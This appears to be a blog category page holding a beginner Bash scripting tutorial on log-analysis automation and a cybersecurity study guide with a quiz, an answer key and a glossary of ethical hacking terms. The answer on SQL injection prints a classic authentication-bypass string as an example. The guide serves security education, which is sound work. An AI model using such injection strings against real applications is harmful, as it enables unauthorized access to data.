Category: Linux

  • Bash Scripting: From Beginner to Automation Wizard

    The source provides a comprehensive Bash scripting tutorial for beginners, focusing on automating repetitive tasks typically encountered in DevOps and system administration roles. It begins by explaining fundamental concepts such as the command line interface (CLI), shell, and Bash, differentiating them from graphical user interfaces (GUIs). The tutorial then transitions into practical application, guiding the user through the process of creating and executing Bash scripts, including details like shebang statements and making scripts executable. Key elements of scripting are introduced, such as using variables for reusability, implementing loops for dynamic processing, and incorporating conditional statements for intelligent analysis. Finally, the source illustrates how to redirect output to files for reporting and provides various real-world use cases for Bash scripting beyond the immediate example.

    Bash Scripting Fundamentals and Automation

    Bash scripting is a powerful way to automate tasks and streamline operations on your computer, particularly for Linux systems. It involves writing programs, called bash scripts, that consist of a series of commands to be executed automatically.

    Here are the basics of Bash scripting:

    Understanding the Fundamentals

    • Command Line Interface (CLI) vs. Graphical User Interface (GUI): While a GUI allows you to interact with your computer by clicking icons, the CLI uses typed commands. The CLI is often more powerful and faster, especially for repetitive tasks, such as creating 100 folders with a single command.
    • Shell: On a Linux operating system, the program that runs and interprets these commands is called a shell.
    • Bash (Bourne Again SHell): Bash is the most common implementation or “flavor” of the shell program for Linux systems. It’s not exclusive to Linux and can be used on other operating systems, but it’s prevalent across many Linux distributions. Bash is not just for running commands; it’s a full programming language that enables automation of tedious and time-consuming manual tasks. This is why “shell scripting” and “bash scripting” are often used interchangeably. Bash offers more advanced features than simpler shell flavors like sh (the original Bourne shell).
    • Terminal: A terminal is a graphical window where you type out commands or run scripts that the shell program (like Bash) will execute.

    Why Use Bash Scripting?

    Bash scripting is highly valuable, especially for roles like DevOps, because it:

    • Automates repetitive tasks: What might take hours manually can be completed in seconds with a script. For example, analyzing numerous log files daily.
    • Ensures consistency: The same script is executed every time, reducing human error and ensuring processes are followed precisely.
    • Provides proper error handling: You can program specific error handling logic into your scripts.
    • Serves as documentation: Scripts automatically document the processes or workflows they execute.
    • Saves time and increases efficiency: Engineers can focus on more enjoyable and creative tasks rather than boring, repetitive command entry.

    Setting Up Your Bash Environment

    • If you have Linux, you are already set up.
    • On Mac, Bash is typically installed but is no longer the default shell (recent macOS versions default to zsh). You can switch to Bash by typing bash in your terminal.
    • For Windows, the best option is to install Windows Subsystem for Linux (WSL), as it provides a more complete Linux environment and is officially supported by Microsoft.
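
    As a quick sketch of these setup steps (the Windows command runs in PowerShell as Administrator, not in Bash; the others are standard shell commands):

        # Windows: install WSL with a default Ubuntu distribution (PowerShell, admin)
        wsl --install

        # Mac/Linux: check your current shell and confirm Bash is available
        echo "$SHELL"
        bash --version
        bash            # start a Bash session if it is not your default shell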

    Creating and Executing a Bash Script

    A shell script is simply a text file containing Linux commands.

    1. Create the file: Use a command like touch analyze_logs.sh. The .sh extension is a convention for human readability and to help code editors, but it’s not strictly required for execution on Unix/Linux systems.
    2. Add commands: Open the file with a text editor (e.g., Vim or Visual Studio Code) and copy your commands into it.
    3. The Shebang Line (#!): This special first line, typically #!/bin/bash for Bash scripts, tells the system which interpreter should be used to execute the script. This is crucial if the script uses Bash-specific syntax, as it differentiates it from other shell implementations.
    4. Make it executable: Initially, your script won’t have execute permission. You need to add it using chmod +x analyze_logs.sh. Programs like vim or touch are also executables, just like your custom script.
    5. Execute the script: Once executable, run it using ./analyze_logs.sh. The ./ tells the shell to look for the script in the current directory.
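
    Putting the five steps together, a minimal end-to-end session might look like this (the script body is illustrative):

        touch analyze_logs.sh        # 1. create the file
        # 2-3. open the file in an editor and add, for example:
        #   #!/bin/bash
        #   echo "Analyzing logs..."
        chmod +x analyze_logs.sh     # 4. grant execute permission
        ./analyze_logs.sh            # 5. run it from the current directory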

    Core Scripting Concepts

    As you develop more complex scripts, you’ll use programming concepts:

    • Variables:
    • Used to store and reuse repeated values, such as directory locations, file names, or error patterns.
    • Defined using VARIABLE_NAME=value (no spaces around the equal sign).
    • Accessed with a dollar sign: $VARIABLE_NAME.
    • Array Variables: Can hold multiple values. Defined as ARRAY_NAME=(value1 value2 value3). Individual elements are accessed using their index (starting from 0): ${ARRAY_NAME[0]}, ${ARRAY_NAME[1]}, and so on. To iterate over all elements in a loop, use ${ARRAY_NAME[@]}.
    • Command Substitution: Allows you to save the output of a command into a variable. The syntax is VARIABLE_NAME=$(command). For example, log_files=$(find . -maxdepth 1 -mtime -1 -name "*.log") saves a list of recently modified log files into the log_files variable.
    • Loops (for): Enable dynamic logic to process multiple items without hardcoding or repeating code. They iterate through a list (like files in a directory or elements in an array) and execute the same logic for each item. The basic syntax is:

          for item in list_of_items; do
              # commands to execute for each item
          done

    • This allows for much cleaner and more reusable code.
    • Conditionals (if): Allow you to program logic that executes only when certain conditions are met. For example, checking if an error count exceeds a specific threshold. The basic syntax is:

          if [ condition ]; then
              # commands to execute if condition is true
          fi

    • Conditions are placed within square brackets [ ], with a space on each side of the condition. A combined sketch of these concepts follows this list.
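
    The sketch below, in the spirit of the tutorial’s log-analysis example, combines a variable, an array, command substitution, loops, and a conditional (the directory, pattern list, and threshold are illustrative assumptions):

        #!/bin/bash

        LOG_DIR="/var/log/myapp"                     # variable: set the location once
        ERROR_PATTERNS=("error" "fatal" "critical")  # array: multiple values

        # command substitution: logs modified in the last 24 hours
        log_files=$(find "$LOG_DIR" -maxdepth 1 -mtime -1 -name "*.log")

        for file in $log_files; do                      # loop over each recent log file
            for pattern in "${ERROR_PATTERNS[@]}"; do   # loop over each error pattern
                count=$(grep -c -i "$pattern" "$file")  # count matching lines
                echo "$file: $count match(es) for '$pattern'"
                if [ "$count" -gt 10 ]; then            # conditional: flag urgent issues
                    echo "WARNING: action required for $file ('$pattern')"
                fi
            done
        done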

    Managing Output

    • Echo Command: Used to print information or variables to the terminal.
    • Use echo -e "Text with\nNewlines" with the -e flag to interpret backslash escape sequences like \n for newlines.
    • Output Redirection:
    • Overwrite: Use > to direct the output of a command to a file, overwriting its existing contents (e.g., command > file.txt).
    • Append: Use >> to direct the output of a command to a file, appending it to existing contents (e.g., command >> file.txt). This is useful for building reports over time.
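
    For example (file names are illustrative):

        echo -e "Log Analysis Report\n===================" > report.txt  # overwrite/create
        echo "Errors found in app.log: 3" >> report.txt                  # append
        echo "Report saved to report.txt"                                # terminal output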

    By understanding these basic concepts, you can start automating many manual, repetitive, and time-consuming tasks, significantly boosting your efficiency and consistency.

    The Power of the Command Line Interface

    The Command Line Interface (CLI) is an alternative way to interact with your computer, distinct from the Graphical User Interface (GUI).

    Here’s a discussion of the Command Line Interface:

    • Definition and Interaction: Unlike a GUI where you perform tasks by clicking icons and visual elements, the CLI involves running commands typed out to instruct the computer. This includes actions such as creating folders, copying or moving files, and opening applications.
    • Power and Speed: The CLI is described as much more powerful and faster than a GUI. For example, if you need to create 100 folders, the CLI allows you to do this all at once with a single command, whereas in a GUI, you would have to create each folder individually.
    • Underlying Program: On a Linux operating system, the program responsible for running and interpreting these typed commands is called a shell. Bash (Bourne Again SHell) is the most common implementation or “flavor” of a shell program for Linux systems, effectively acting as the specific interpreter for commands typed in the CLI.
    • Terminal: A terminal is the graphical window where you type out your commands or run scripts that a shell program, like Bash, will then execute.
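
    For instance, the 100-folders example can be done in Bash with a single brace-expansion command:

        mkdir folder_{1..100}   # creates folder_1 through folder_100 at once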

    Bash Scripting for Task Automation and Efficiency

    Automating repetitive tasks is a core benefit and primary purpose of Bash scripting, significantly enhancing efficiency and consistency in various computing operations, particularly on Linux systems.

    Here’s a discussion on automating repetitive tasks using Bash scripting:

    • Core Purpose of Bash Scripting: Bash is not merely a program for running commands; it’s a full programming language that enables you to automate tasks that would otherwise be tedious and very time-consuming to do manually. This is why “shell scripting” and “bash scripting” are often used interchangeably when discussing automation.
    • Transformative Impact on Efficiency: What might take hours to complete manually can be finished in seconds with a script. For instance, a senior engineer showed how a shell script could complete in seconds what used to take half a day. This dramatically saves time and increases efficiency, freeing engineers to focus on more creative and enjoyable tasks instead of repetitive command entry.
    • Addressing Tedious and Repetitive Work: Many roles, such as DevOps engineers or software engineers, involve a lot of repetitive work. For example, manually checking log files daily can take 30 to 45 minutes, depending on the number of files, making it a waste of an engineer’s time due to repetitive command entry. Instead, with a shell script, you can save these steps and commands and simply execute them all in one go.
    • Benefits Beyond Speed: Automating tasks with Bash scripting offers several key advantages:
    • Ensures Consistency: The same script gets executed every time, eliminating reliance on memorizing command sequences and reducing human error.
    • Proper Error Handling: You can program in specific error handling logic within your scripts.
    • Serves as Documentation: Scripts automatically document the processes or workflows they execute, aligning with the “everything as code” concept in DevOps.
    • Dynamic Logic and Reusability: Scripts can incorporate dynamic logic using variables and loops, allowing them to process multiple items (like log files or error patterns) without hardcoding values or repeating code. This makes the code cleaner, more reusable, and more extendable.
    • Practical Use Cases for Automation: Bash scripting can automate a wide range of tasks:
    • Log Analysis: Regularly scanning server log directories for issues, filtering specific error types (e.g., error, fatal, critical), counting occurrences, and even generating reports. A script can be designed to analyze only logs modified within the last 24 hours to focus on recent changes.
    • Local Development Environment Setup: For new team members, a script can quickly set up a developer’s local machine with all necessary tools, configurations, required software versions, environment variables, Git repositories, and test databases. This can save hours or days of manual setup and troubleshooting while ensuring consistent environments across developers.
    • Log Management and Cleanup: Scripts can scan server log directories daily, compress older logs, and delete the oldest ones based on space usage. They can also include logic to email administrators when disk space runs low or to keep important error logs longer than routine logs, preventing server crashes due to full disks.
    • Custom Alerts: Scripts can incorporate conditional logic to alert users if specific criteria are met, such as detecting more than 10 critical errors in any log file, providing actionable results.

    By defining the logic once in a script, it can be executed daily with a single command, providing much more actionable results in milliseconds compared to manual command execution. These scripts can be shared and collaborated on within teams, just like application code, making jobs more enjoyable and efficient.

    Bash Script Optimization: Flexible, Robust, Reusable, and Efficient

    Script optimization in Bash scripting focuses on making scripts more flexible, robust, reusable, and efficient by avoiding hardcoding and repetitive code. This allows for the creation of powerful automation tools that can adapt to changing conditions and process large amounts of data dynamically.

    Here are key aspects of script optimization:

    1. Avoiding Hardcoding with Variables

    Initially, a script might hardcode specific file names or directory locations, making it inflexible and prone to breaking if files are moved or the script is run on a different machine.

    • Problem: Hardcoding values like /users/nat/logs/application.log means if the log directory changes, almost every line of the script needs to be rewritten.
    • Solution: Use variables to store and reuse these repeated values, such as directory locations, file names, or even error patterns.
    • Syntax: VARIABLE_NAME=value (no spaces around the equal sign).
    • Accessing: Use a dollar sign: $VARIABLE_NAME.
    • Benefit: If a value changes (e.g., log directory), you only need to adjust it once at the beginning of the script, making the code much more optimized, reusable, and robust.
    • Array Variables: For values that consist of multiple options (e.g., error, fatal, critical error patterns), array variables can hold multiple values.
    • Syntax: ARRAY_NAME=(value1 value2 value3).
    • Accessing Elements: Elements are accessed by their index (starting from 0): ${ARRAY_NAME[0]}, ${ARRAY_NAME[1]}, and so on. To expand all elements for iteration in a loop, use ${ARRAY_NAME[@]}.
    • Benefit: This allows for dynamic handling of various patterns without hardcoding each one (see the sketch after this list).
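
    A minimal before/after sketch using the log path from above:

        # Hardcoded: every occurrence must change if the directory moves
        grep -i "error" /users/nat/logs/application.log

        # With a variable: adjust the location once at the top of the script
        LOG_DIR="/users/nat/logs"
        grep -i "error" "$LOG_DIR/application.log"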

    2. Capturing Command Output with Command Substitution

    Often, the output of one command needs to be used as input or data for subsequent operations within the script.

    • Solution: Command substitution allows you to save the result of a command’s execution directly into a variable.
    • Syntax: VARIABLE_NAME=$(command).
    • Example: log_files=$(find . -maxdepth 1 -mtime -1 -name "*.log") will save a list of log files modified in the last 24 hours into the log_files variable.
    • Benefit: This enables scripts to dynamically determine and work with sets of files or data based on live system conditions, rather than having to manually identify them.
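
    Command substitution can capture any command’s output, not just file lists; a short sketch:

        # Save the list of recent logs into a variable
        log_files=$(find . -maxdepth 1 -mtime -1 -name "*.log")

        # Capture a derived value, such as how many files were found
        file_count=$(find . -maxdepth 1 -mtime -1 -name "*.log" | wc -l)
        echo "Found $file_count recent log file(s)"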

    3. Implementing Dynamic Logic with Loops

    When the same set of operations needs to be performed on multiple items (e.g., all log files in a directory or all defined error patterns), loops are essential for optimization.

    • Problem: Manually repeating code for each file or each error pattern is tedious, error-prone, and not scalable.
    • Solution: Use for loops to iterate through a list of items (like the log_files array or error_patterns array) and execute the same logic for each.
    • Basic Syntax:

          for item in list_of_items; do
              # commands to execute for each item
          done

    • Nested Loops: Loops can be nested (e.g., iterating through each log file, and then for each file, iterating through each error pattern) to handle complex, multi-dimensional tasks efficiently.
    • Benefit: Loops make the code much cleaner, more reusable, and more extendable. They allow a few lines of code to process an arbitrary number of files or patterns dynamically, eliminating manual checks and repetitive code blocks (a nested-loop sketch follows this list).
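
    The following nested-loop sketch mirrors the examples above (variable names are illustrative):

        log_files=$(find . -maxdepth 1 -mtime -1 -name "*.log")
        ERROR_PATTERNS=("error" "fatal" "critical")

        for file in $log_files; do                      # outer loop: each log file
            for pattern in "${ERROR_PATTERNS[@]}"; do   # inner loop: each pattern
                grep -i "$pattern" "$file"              # same logic for every pair
            done
        done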

    4. Adding Decision-Making with Conditionals

    Scripts often need to perform different actions based on specific conditions or thresholds.

    • Solution: Use if conditionals to program logic that executes only when certain criteria are met.
    • Syntax:

          if [ condition ]; then
              # commands to execute if condition is true
          fi

    • Example: Checking if the error_count found in a log file is greater than 10 and then printing an “action required” warning (see the sketch after this list).
    • Benefit: Conditionals allow the script to provide intelligent analysis and immediate alerts, guiding the user to urgent issues without manual review of entire reports. This saves time and helps prioritize actions.
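
    A minimal sketch of that threshold check (assuming $file is set by an enclosing loop, as above):

        error_count=$(grep -c -i "critical" "$file")   # count lines matching the pattern
        if [ "$error_count" -gt 10 ]; then
            echo "ACTION REQUIRED: $error_count critical errors in $file"
        fi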

    5. Managing Output with Redirection

    Controlling where the script’s output goes is crucial for readability and subsequent analysis.

    • Problem: Default output to the terminal can be overwhelming for large reports and doesn’t provide a permanent record.
    • Solution: Use output redirection to direct command output to a file.
    • Overwrite: > (e.g., command > file.txt) will create the file if it doesn’t exist or overwrite its content if it does.
    • Append: >> (e.g., command >> file.txt) will append the output to the end of an existing file or create the file if it doesn’t exist. This is useful for building up a report over time.
    • Benefit: This allows saving analysis into report files for later review, sharing, and better organization, while still allowing for a final summary message to be displayed on the terminal.
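
    Building a report this way might look like the following sketch (the log file name is illustrative; the report name matches the one used later in this document):

        REPORT="log_analysis_report.txt"

        echo "Log Analysis Report - $(date)" > "$REPORT"   # overwrite: start fresh each run
        grep -i "error" app.log >> "$REPORT"               # append findings as the script runs
        echo "Analysis complete. See $REPORT"              # short summary stays on the terminal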

    By applying these optimization techniques, Bash scripts evolve from simple command execution lists into powerful, flexible, and automated programs that significantly enhance efficiency and consistency for repetitive and time-consuming tasks.

    CLI and Bash Scripting: Automation and Efficiency

    The Command Line Interface (CLI) and Bash scripting offer numerous practical use cases, primarily centered around automating repetitive and time-consuming tasks to enhance efficiency, consistency, and reliability.

    Here are some practical applications:

    • Automating Log Analysis and Monitoring
    • Daily Log Checks: Instead of manually checking server log files daily, which can take 30 to 45 minutes depending on the number of files and involves repetitive command entry, a Bash script can automate this process entirely.
    • Filtering and Counting Errors: Scripts can be designed to scan logs for specific error patterns (e.g., “error,” “fatal,” “critical”), count their occurrences, and even display the actual error messages.
    • Focusing on Recent Changes: To avoid re-analyzing old data, scripts can filter for log files modified within a specific timeframe, such as the last 24 hours, ensuring only relevant logs are processed.
    • Generating Reports: The analysis output can be redirected and saved into a report file (e.g., log_analysis_report.txt), making it easy to reference, share, or store for later review.
    • Conditional Alerts: Scripts can incorporate logic to alert users if specific conditions are met, such as detecting more than 10 critical or fatal errors in any log file. This provides immediate warnings and helps prioritize issues, especially when dealing with long reports.
    • Local Development Environment Setup
    • For new team members, a script can quickly set up a developer’s local machine. This includes installing necessary tools, configuring environment variables, cloning relevant Git repositories, creating test databases, and ensuring all required software versions are in place.
    • This automation saves hours or even days of manual setup and troubleshooting, while also ensuring that every developer has a consistent and identical environment.
    • Server Log Management and Cleanup
    • Scripts can be written to scan server log directories daily.
    • They can compress older logs and delete the oldest ones based on disk space usage, preventing servers from crashing due to full disks.
    • Advanced logic can be added to email administrators when disk space runs low or to preserve important error logs for longer periods than routine logs.
    • Mass Operations and Dynamic Processing
    • The CLI’s inherent power allows for creating numerous files or folders with a single command, which would be tedious in a GUI.
    • Bash scripts can dynamically process multiple items using loops (e.g., iterating through all log files in a directory or all defined error patterns), making the code cleaner, more reusable, and more extendable without hardcoding values.

    These use cases highlight how Bash scripting transforms otherwise tedious, repetitive, and time-consuming manual operations into efficient, consistent, and automated workflows, freeing engineers to focus on more complex and creative tasks.

    Bash Scripting Tutorial for Beginners

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Ethical Hacking and Penetration Testing with Kali Linux

    The provided sources offer a comprehensive overview of cybersecurity in 2024. They explore foundational and advanced concepts crucial for aspiring cybersecurity professionals, including cryptography, risk management, security technologies, and ethical hacking methodologies. The texts detail various types of hackers, their motivations, and the ethical responsibilities of cybersecurity experts. Furthermore, the sources introduce essential tools like Nmap, Metasploit, and Wireshark, explaining their practical applications in vulnerability assessment and penetration testing. Finally, they discuss common cyber threats such as phishing, SQL injection, and cross-site scripting, alongside preventative measures and career paths in the cybersecurity field.

    Cybersecurity Fundamentals Study Guide

    Quiz

    1. Explain the concept of social engineering in the context of cybersecurity. Provide an example of a common social engineering tactic and why it is often successful.
    2. Describe the purpose of encryption in cybersecurity. Differentiate between symmetric and asymmetric encryption, highlighting a key advantage of each.
    3. What is a brute-force attack, and why can it be time-consuming? Briefly describe two other methods of cryptanalysis besides brute force.
    4. Explain the difference between a white hat hacker and a black hat hacker. What is the primary role of an ethical hacker within an organization?
    5. Outline the five phases of penetration testing. Which phase is considered the most crucial for a successful penetration test, and why?
    6. Define SQL injection and explain why it is a significant web application vulnerability. Provide a simple example of how an attacker might attempt an SQL injection.
    7. What is a Denial-of-Service (DoS) attack? How does a Distributed Denial-of-Service (DDoS) attack differ from a DoS attack, and why is it generally more challenging to mitigate?
    8. Explain what a botnet is and how it is typically created. What are botnets commonly used for in cyberattacks?
    9. Describe the main difference between a virus and a Trojan horse. Give one example of the negative impact each can have on a computer system.
    10. What is Wireshark, and why is it a valuable tool for network analysis in cybersecurity? Briefly explain what kind of information Wireshark allows a user to see.

    Quiz Answer Key

    1. Social engineering involves manipulating individuals into divulging confidential information or performing actions that compromise security. A common tactic is phishing, where fraudulent emails from seemingly trustworthy sources trick users into revealing passwords or clicking malicious links. This is often successful because it exploits human psychology, such as trust and urgency.
    2. Encryption transforms data into an unreadable format (ciphertext) to protect its confidentiality. Symmetric encryption uses the same key for encryption and decryption, offering speed. Asymmetric encryption uses separate public and private keys, simplifying secure key exchange.
    3. A brute-force attack involves trying every possible key combination to decrypt data, which can take a significant amount of time due to the vast number of potential keys. Two other cryptanalysis methods are dictionary attacks (using a list of common passwords) and rainbow table attacks (using pre-computed hash values).
    4. A white hat hacker (ethical hacker) works to find security vulnerabilities in systems with permission to improve security, while a black hat hacker exploits vulnerabilities for malicious purposes. The primary role of an ethical hacker is to identify weaknesses and recommend solutions to protect an organization’s assets.
    5. The five phases of penetration testing are reconnaissance (information gathering), scanning, exploitation, post-exploitation, and reporting. Reconnaissance is considered the most crucial because the quality and breadth of information gathered directly impact the effectiveness of subsequent phases by informing the choice of tools and attack vectors.
    6. SQL injection is a vulnerability that allows attackers to insert malicious SQL code into an application’s database queries. It’s significant because it can lead to data breaches, unauthorized access, and data manipulation. An attacker might try entering ' OR '1'='1 into a username field to bypass authentication.
    7. A Denial-of-Service (DoS) attack aims to disrupt a service by overwhelming it with traffic from a single source, making it unavailable to legitimate users. A Distributed Denial-of-Service (DDoS) attack uses numerous compromised devices (bots) to flood the target, making it harder to block the attack source and increasing the volume of malicious traffic.
    8. A botnet is a network of compromised devices (bots) infected with malware and controlled remotely by a single attacker (bot herder). Botnets are typically created by exploiting vulnerabilities or using social engineering to spread malware. They are commonly used for DDoS attacks, spam distribution, and data theft.
    9. A virus is a malicious code that attaches itself to a host program and replicates by spreading to other programs, often causing system damage or data corruption. A Trojan horse disguises itself as legitimate software but contains hidden malicious functionality, such as creating backdoors for unauthorized access or stealing data.
    10. Wireshark is a network protocol analyzer that captures network packets in real time and displays them in a human-readable format. It is valuable for cybersecurity as it allows users to examine network traffic, identify security issues, troubleshoot network problems, and understand communication protocols at a detailed level, including source and destination IPs, protocols used, and data content.

    Essay Format Questions

    1. Discuss the evolving landscape of cyber threats and the increasing importance of ethical hacking in mitigating these risks. Provide specific examples of how ethical hacking methodologies can be applied to different types of cyber threats.
    2. Compare and contrast different types of social engineering attacks, analyzing the psychological principles that attackers exploit. Evaluate the effectiveness of various countermeasures that organizations and individuals can implement to defend against these attacks.
    3. Analyze the strengths and weaknesses of different encryption methods (symmetric vs. asymmetric) and cryptanalysis techniques. Discuss scenarios where specific encryption algorithms and cryptanalysis approaches are most effective or vulnerable.
    4. Evaluate the significance of penetration testing in an organization’s cybersecurity strategy. Discuss the different phases of a penetration test and the critical factors that contribute to its success in identifying and addressing vulnerabilities.
    5. Examine the technical mechanisms and impacts of Denial-of-Service and Distributed Denial-of-Service attacks. Discuss various strategies and technologies that organizations can employ to prevent and mitigate these types of attacks.

    Glossary of Key Terms

    • Academic Qualifications: Formal certifications and degrees obtained through educational institutions.
    • Algorithm: A step-by-step procedure or set of rules used to solve a problem or perform a computation.
    • Anonymization: The process of removing personally identifiable information from data to protect privacy.
    • Antivirus: Software designed to detect and remove malicious software (malware) like viruses and Trojans.
    • API Token: A unique identifier used to authenticate an application or user accessing an Application Programming Interface (API).
    • ARP Spoofing: A malicious technique where an attacker sends falsified Address Resolution Protocol (ARP) messages over a local area network.
    • Authentication: The process of verifying the identity of a user, device, or process.
    • Authorization: The process of determining what actions a user, device, or process is permitted to perform.
    • Bash Script: A series of commands written in the Bash (Bourne-Again SHell) scripting language, used for automation in Linux and other Unix-like operating systems.
    • Black Hat Hacker: An individual who attempts to gain unauthorized access to computer systems or networks for malicious purposes.
    • Block Cipher: A type of symmetric encryption algorithm that encrypts data in fixed-size blocks.
    • Bot Herder: The individual who controls a botnet.
    • Botnet: A network of compromised computers or devices (bots) controlled remotely by an attacker to perform malicious tasks.
    • Brute Force Attack: A cryptanalysis technique that involves trying every possible key or password until the correct one is found.
    • Buffer Overrun: A vulnerability that occurs when a program writes more data to a buffer than it is allocated to hold, potentially overwriting adjacent memory.
    • Burp Suite: A popular integrated platform used for web application security testing.
    • Caesar Cipher: A simple substitution cipher where each letter in the plaintext is shifted a certain number of places down the alphabet.
    • Capturing Data: The act of intercepting and recording network traffic or other digital information.
    • Certified Ethical Hacker (CEH): An individual who has the skills and knowledge to look for weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner.
    • Cipher: The result of encrypting plaintext; also refers to a method of encryption.
    • Ciphertext: Data that has been encrypted and is unreadable without the correct decryption key.
    • Command Line Interface (CLI): A text-based interface used to interact with an operating system or application by typing commands.
    • Content Delivery Network (CDN): A geographically distributed network of proxy servers and their data centers.
    • Cryptography: The art and science of concealing information to make it unreadable to unauthorized individuals.
    • Cryptanalysis: The art of breaking codes and ciphers; analyzing cryptographic systems to reveal hidden information.
    • Cyber Attack: A malicious attempt to gain unauthorized access to a computer system, network, or digital information, typically to disrupt operations, steal data, or cause other harm.
    • Cyber Security: The practice of protecting computer systems, networks, and digital information from theft, damage, disruption, or unauthorized access.
    • Data Breach: A security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual unauthorized to do so.
    • Data Encryption Standard (DES): A symmetric-key algorithm for encrypting digital data.
    • Decryption: The process of converting ciphertext back into its original plaintext using the correct key.
    • Deep Web: Parts of the World Wide Web whose contents are not indexed by standard search engines.
    • Denial of Service (DoS) Attack: An attack that aims to make a computer resource unavailable to its intended users.
    • Dictionary Attack: A cryptanalysis technique that tries to crack passwords by testing words from a dictionary.
    • Digital Signature: A mathematical technique used to validate the authenticity and integrity of a message or document.
    • Distributed Denial of Service (DDoS) Attack: A type of DoS attack where the malicious traffic originates from multiple compromised devices.
    • DNS Enumeration: The process of locating DNS servers and records for a specific domain.
    • Email Spoofing: The forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.
    • Enigma: A famous cryptographic cipher device used by Nazi Germany during World War II.
    • Encryption: The process of converting data into an unreadable format (ciphertext) to protect its confidentiality.
    • Exploit: A piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability to cause unintended or unanticipated behavior on computer software, hardware, or something electronic.
    • Firewall: A network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
    • Fishing (Phishing): The source’s transcript renders “phishing” as “fishing”; see Phishing.
    • Forensic Analysis: The process of examining digital evidence to understand security incidents and gather information for legal or investigative purposes.
    • Hash Function: A mathematical function that converts an input of arbitrary size into an output of a fixed size (the hash value).
    • Hash Value: The output of a hash function; often used to verify data integrity.
    • Hping3: A command-line oriented TCP/IP packet generator and analyzer.
    • HTTPS: A secure version of the HTTP protocol that uses encryption for secure communication over the internet.
    • Hypertext Markup Language (HTML): The standard markup language for creating web pages.
    • Incident Response: The process of handling and managing the aftermath of a security incident.
    • Initialization Vector (IV): A block of bits used in cryptographic algorithms to randomize the encryption and decryption process.
    • Internet Protocol (IP) Address: A numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication.
    • John the Ripper: A popular open-source password security auditing and password recovery tool.
    • Kali Linux: A Debian-based Linux distribution designed for digital forensics and penetration testing.
    • Key: A piece of information used in cryptography to encrypt or decrypt data.
    • Key Generation: The process of creating cryptographic keys.
    • LHOST (Localhost): In Metasploit, the IP address of the attacker’s local machine that a payload connects back to; more generally, localhost is the local computer’s loopback address (typically 127.0.0.1).
    • Macro Virus: A computer virus written in a macro language embedded in a software application.
    • Malicious Hackers (Black Hats): Individuals who exploit vulnerabilities in computer systems or networks for unauthorized or harmful purposes.
    • Malware: Software that is intended to damage or disable computers and computer systems.
    • Man-in-the-Middle (MITM) Attack: An attack where the attacker secretly relays and potentially alters the communications between two parties who believe they are communicating directly with each other.
    • Master Boot Record (MBR): The first sector of a storage device that contains code to boot the operating system.
    • Metasploit: A penetration testing framework that contains a collection of exploits and tools.
    • Network Architecture: The design and structure of a computer network, including its components and their interactions.
    • Network Packet: A small unit of data transmitted over a network.
    • Nikto: An open-source web server scanner that performs comprehensive tests against web servers for multiple types of vulnerabilities.
    • OWASP Broken Web Applications Project: A collection of intentionally vulnerable web applications used for security testing and training.
    • Onion Links: Special URLs used to access hidden services on the Tor network.
    • OpenVAS (Greenbone Vulnerability Manager): A comprehensive vulnerability management system.
    • Operating System (OS): The software that supports a computer’s basic functions, such as scheduling tasks, executing applications, and controlling peripherals.
    • Packet Filtering Firewall: A firewall that controls network access by examining the source and destination addresses, protocols, and ports of network packets.
    • Password Cracking: The process of attempting to recover passwords from stored or transmitted data.
    • Password Policies: A set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly.
    • Penetration Testing: A simulated cyberattack performed on a computer system or network to evaluate its security.
    • Payload: The part of an exploit that performs the intended malicious action.
    • Peer-to-Peer (P2P) Model: A decentralized communication model where each node can act as both a client and a server.
    • Phishing: A type of social engineering attack where attackers send fraudulent messages that appear to come from a trusted source, designed to trick individuals into revealing sensitive information.
    • Plaintext: Unencrypted data.
    • Port (Networking): A communication endpoint in a computer’s operating system associated with a specific service or application.
    • Proxy Chains: A tool that forces any TCP connection made by any given application to follow a chain of proxies.
    • Proxy Firewall: A firewall that acts as an intermediary between a network and the internet, handling requests on behalf of client systems.
    • Public Key: A cryptographic key that can be shared with others and is used for encryption or verifying digital signatures.
    • Rainbow Table Attack: A cryptanalysis technique that uses pre-computed tables of hash values to crack passwords.
    • Ransomware: A type of malware that encrypts a victim’s files and demands a ransom payment to restore access.
    • Reconnaissance: The initial phase of a penetration test or attack where information about the target is gathered.
    • Reverse Engineering: The process of analyzing a hardware or software system to understand its design and functionality.
    • Reverse TCP Connection: A type of network connection where the target machine initiates the connection back to the attacker’s machine.
    • Risk Assessment: The process of identifying, analyzing, and evaluating potential risks.
    • Root Access: The highest level of access control in Unix-like operating systems.
    • Router: A networking device that forwards data packets between computer networks.
    • RSA: A public-key cryptosystem that is widely used for secure data transmission.
    • Scanning (Penetration Testing): The phase of a penetration test where tools are used to identify open ports, services, and vulnerabilities on the target system.
    • Security Auditing: A systematic evaluation of the security of an organization’s information systems.
    • Server Message Block (SMB): A network file-sharing protocol.
    • Shell: A command-line interpreter that provides an interface to the operating system.
    • Shellcode: A small piece of code used as the payload in the exploitation of software vulnerabilities.
    • Simplilearn: (In the context of the source) The educational platform that produced the material.
    • Sniffing: The process of monitoring and capturing network traffic.
    • Social Engineering: The manipulation of individuals to perform actions or divulge confidential information.
    • SQL (Structured Query Language): A domain-specific language used in programming and designed for managing data held in a relational database management system.
    • SQL Injection: A code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
    • SSL Handshake: The process that initiates a secure communication session between a client and a server using the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocol.
    • Stateful Inspection Firewall: A firewall that keeps track of the state of network connections and makes decisions based on the context of these connections.
    • Subdomain: A domain that is part of a larger domain.
    • Substitution Cipher: A method of encryption by which units of plaintext are replaced with ciphertext according to a regular system.
    • Sudo: A program that allows a permitted user to execute a command as the superuser or another user, as specified by the security policy.
    • Superuser: A user with administrative privileges (e.g., root in Linux).
    • Symmetric Encryption: An encryption method in which the same key is used for both encryption and decryption.
    • SYN Packet: A type of TCP packet used to initiate a connection.
    • Target URI: The specific Uniform Resource Identifier (path) on a server that is being targeted by an attack.
    • TCP/IP: The suite of communication protocols used to interconnect network devices on the Internet.
    • Tor Browser: A web browser designed for anonymity and privacy, using the Tor network.
    • Trojan Horse: A type of malware that appears to be legitimate software but performs malicious actions when run.
